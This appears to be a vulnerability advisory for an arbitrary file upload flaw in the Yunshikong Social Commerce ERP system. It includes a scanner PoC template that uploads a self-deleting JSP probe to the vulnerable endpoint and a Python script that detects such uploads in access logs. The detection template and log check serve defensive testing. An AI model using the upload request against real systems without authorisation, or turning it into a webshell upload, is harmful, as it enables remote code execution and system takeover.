yunshikong-erp-file-upload: Yunshikong ERP File Upload

Date: 2025-09-01 | Affected software: yunshikong-erp-file-upload | PoC: public

Vulnerability description

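The /servlet/fileupload/gpy endpoint of the Yunshikong Social Commerce ERP system (云时空社会化商业ERP系统) has an arbitrary file upload vulnerability. Through it, an attacker can upload a webshell and gain system privileges. app="云时空社会化商业ERP系统"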

PoC code [public]

id: yunshikong-erp-file-upload

info:
  name: 云时空ERP文件上传
  author: laohuan12138
  severity: critical
  verified: true
  description: |
    云时空社会化商业ERP系统接口/servlet/fileupload/gpy存在任意文件上传漏洞,通过此漏洞,攻击者可上传webshell获取系统权限。
    app="云时空社会化商业ERP系统"
  reference:
    - https://github.com/wy876/wiki/blob/a6bcd102ae2ceb8a42f2ced7062f9fd937b1cec7/%E4%BA%91%E6%97%B6%E7%A9%BA%E7%A4%BE%E4%BC%9A%E5%8C%96%E5%95%86%E4%B8%9AERP%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.md?plain=1#L10
  tags: yunshikong,fileupload
  created: 2024/01/04

set:
  r3: randomInt(40000, 44800)
  r4: randomInt(40000, 44800)
  randname: randomLowercase(6)
  fileth: year(0) + "-" + month(0) + "-" + day(0)
  q: replaceAll(fileth,"-0","-")
  rboundary: randomLowercase(8)
rules:
  r1:
    request:
      method: POST
      path: /servlet/fileupload/gpy
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randname}}.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<% out.print({{r3}} * {{r4}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n------WebKitFormBoundary{{rboundary}}--\r\n"
    expression: response.status == 200

  r2:
    request:
      method: GET
      path: /uploads/pics/{{q}}/{{randname}}.jsp
    expression: response.status == 200 && response.body.bcontains(bytes(string(r3 * r4)))
expression: r1() && r2()
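
A log-side check for the behaviour this template exercises, as an added example (not part of the original page or the template author's code): it scans web access logs for POSTs to /servlet/fileupload/gpy and for requests to .jsp/.jspx files under /uploads/pics/. The probe JSP above deletes itself when first requested, so the access log can be the only surviving trace. The combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (assumption; not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [04/Jan/2024:10:01:02 +0800] "POST /servlet/fileupload/gpy HTTP/1.1" 200 57 "-" "-"
203.0.113.7 - - [04/Jan/2024:10:01:03 +0800] "GET /uploads/pics/2024-1-4/qwerty.jsp HTTP/1.1" 200 10 "-" "-"
198.51.100.9 - - [04/Jan/2024:10:05:00 +0800] "GET /uploads/pics/2024-1-4/scan001.jpg HTTP/1.1" 200 48211 "-" "-"
198.51.100.9 - - [04/Jan/2024:10:06:00 +0800] "POST /servlet/fileupload/gpy HTTP/1.1" 200 57 "-" "-"
192.0.2.44 - - [04/Jan/2024:10:07:00 +0800] "GET /uploads/pics/2024-1-4/abc.JSP;x=1 HTTP/1.1" 404 0 "-" "-"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOAD_PATH = "/servlet/fileupload/gpy"
# Server-side script extensions inside the upload directory, any case.
SCRIPT_RE = re.compile(r"^/uploads/pics/[^/]+/[^/]+\.jspx?$", re.IGNORECASE)


def normalize(uri):
    """Decode the URI and drop the query string and ;path-parameters."""
    path = unquote(uri).split("?", 1)[0]
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def analyze(log_text):
    """Return (rule, client, timestamp, path, status) tuples in log order."""
    findings, uploaders = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, method, uri, status = m.groups()
        path = normalize(uri)
        if method == "POST" and path == UPLOAD_PATH:
            # A POST alone is recorded for review and for correlation below.
            uploaders.add(ip)
            findings.append(("upload-endpoint-post", ip, ts, path, status))
        elif SCRIPT_RE.match(path):
            # Highest confidence: the same client uploaded earlier and got a 200.
            hit = status == "200" and ip in uploaders
            rule = "upload-then-execute" if hit else "script-in-upload-dir"
            findings.append((rule, ip, ts, path, status))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Any `upload-then-execute` hit warrants treating the host as compromised; `script-in-upload-dir` hits with a non-200 status still show that someone probed the upload directory for scripts.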
